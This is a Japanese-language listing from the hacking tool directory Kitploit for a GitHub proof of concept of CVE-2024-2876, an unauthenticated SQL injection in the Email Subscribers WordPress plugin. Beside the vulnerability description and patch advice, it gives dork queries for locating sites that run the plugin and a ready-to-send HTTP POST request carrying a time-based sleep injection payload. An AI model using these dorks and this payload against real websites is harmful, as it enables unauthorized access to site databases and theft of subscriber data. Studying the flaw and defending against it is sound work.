Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-2876 — CVE-2024-2876の概念実証。Email Subscribers WordPressプラグインにおける未認証SQLインジェクションで、dorkクエリと実際に動作するエクスプロイトリクエストを含む。 | Kitploit
ツール/GitHubGitHub/babydessy/cve-2024-2876
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubbabydessy/cve-2024-2876

CVE-2024-2876

CVE-2024-2876の概念実証。Email Subscribers WordPressプラグインにおける未認証SQLインジェクションで、dorkクエリと実際に動作するエクスプロイトリクエストを含む。

リポジトリを見る
112年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-2876

#脆弱性の説明: WordPress & WooCommerce向けのEmail Marketing、Newsletters、AutomationプラグインであるEmail Subscribers by Icegram Express – Email Marketing、Newsletters、Automation for WordPress & WooCommerceは、5.7.14以前のすべてのバージョンにおいて、ユーザーが指定したパラメータのエスケープが不十分であり、既存のSQLクエリに対する十分な準備が欠如しているため、‘IG_ES_Subscribers_Query’クラスの‘run’関数を介したSQLインジェクションに対して脆弱です。これにより、認証されていない攻撃者が既存のクエリに追加のSQLクエリを追加できるようになり、データベースから機密情報を抽出するために使用される可能性があります。

#Dork: 1- FOFA : body="/wp-content/plugins/email-subscribers/" 2- publicwww : "/wp-content/plugins/email-subscribers/"

#POC: POST /wp-admin/admin-post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

#Youtube POC: https://www.youtube.com/watch?v=eDEGt_yXyvE

#修正方法は? 5.7.14までのすべてのバージョンでこのCVEが検出されているため、ユーザーはEmail Subscribers by Icegram Expressプラグインをバージョン5.7.15(または最新リリースの5.7.19)にアップグレードすることを推奨します。 Patchstackユーザーは、脆弱なプラグイン専用の自動更新を有効にするオプションがあります。 追加の保護層としてWAF/WAAPソリューションを導入してください。このようなソリューションの利点は、脆弱性が新しく未知のものであっても(0-day)、悪用パターンや手法を検出することで攻撃を防ぐことができる可能性があることです。

#リソース: https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/

ツールをダウンロード